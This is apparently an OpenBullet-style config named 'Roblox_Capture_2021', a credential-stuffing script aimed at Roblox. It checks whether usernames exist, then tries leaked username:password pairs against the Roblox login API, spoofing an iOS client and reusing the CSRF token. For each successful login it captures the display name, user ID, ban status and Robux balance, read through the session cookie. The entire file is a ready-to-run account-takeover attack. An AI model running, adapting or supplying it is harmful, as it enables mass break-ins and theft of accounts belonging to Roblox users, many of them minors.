[SETTINGS]
{
  "Name": "roblox",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-26T15:09:59.0619651+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Roblox_Capture_2021",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://auth.roblox.com/v1/usernames/validate?birthday=1992-12-31T23:00:00.000Z&context=Signup&username=<USER>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Username is already in use" 
  KEYCHAIN Failure OR 
    KEY "Username not appropriate for Roblox" 
    KEY "Username is valid" 
    KEY "Usernames can have at most one _" 
    KEY "Only a-z, A-Z, 0-9, and _ are allowed" 
    KEY "Usernames can be 3 to 20 characters long" 
    KEY "A valid username is required." 

FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d" -> VAR "RanStr" 

REQUEST POST "https://auth.roblox.com/v1/login" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; iPhone9,1; CPU iPhone OS 12.4 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176 ROBLOX iOS App 2.428.401006 Hybrid RobloxApp/2.428.401006 (GlobalDist; AppleAppStore)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST POST "https://auth.roblox.com/v1/login" 
  CONTENT "{\"ctype\":\"Username\",\"cvalue\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; iPhone9,1; CPU iPhone OS 12.4 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176 ROBLOX iOS App 2.428.401006 Hybrid RobloxApp/2.428.401006 (GlobalDist; AppleAppStore)" 
  HEADER "RBX-Device-Handle: <RanStr>" 
  HEADER "X-CSRF-TOKEN: <HEADERS(x-csrf-token)>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "displayName" 
  KEYCHAIN Ban OR 
    KEY "You must pass the robot test" 
  KEYCHAIN Failure OR 
    KEY "Incorrect" 

#Name PARSE "<SOURCE>" LR "displayName\":\"" "\"}," CreateEmpty=FALSE -> CAP "Display Name" 

#Banned? PARSE "<SOURCE>" LR "\"},\"isBanned\":" "}" CreateEmpty=FALSE -> CAP "Banned (True/False)" 

#UserID PARSE "<SOURCE>" LR "{\"user\":{\"id\":" ",\"name\":\"" CreateEmpty=FALSE -> CAP "UserID" 

REQUEST GET "https://api.roblox.com/my/balance/" 
  
  COOKIE ".ROBLOSECURITY: <COOKIES(.ROBLOSECURITY)>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 

PARSE "<SOURCE>" JSON "robux" CreateEmpty=FALSE -> CAP "Robux" 

